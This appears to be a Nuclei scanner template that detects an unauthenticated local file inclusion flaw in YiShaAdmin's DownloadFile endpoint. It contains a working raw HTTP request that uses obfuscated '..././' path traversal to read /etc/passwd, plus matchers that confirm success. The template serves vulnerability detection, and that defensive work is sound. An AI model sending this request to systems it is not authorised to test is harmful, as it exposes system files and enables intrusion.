id: yishaadmin-lfi

info:
  name: yishaadmin - Local File Inclusion
  author: Evan Rubinstein
  severity: high
  description: yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication.
  reference:
    - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/
    - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,yishaadmin,huntr

http:
  - raw:
      - |
        GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 490a00463044022032cb71b16f90dd94fefde81177143a4f3c2fca63afabeddd33fee8872fdb648302203799f0e5ccdf8e77a2704b3b0e19e16671c298182e2838af0191b5d4e97fea46:922c64590222798bb761d5b6d8e72950
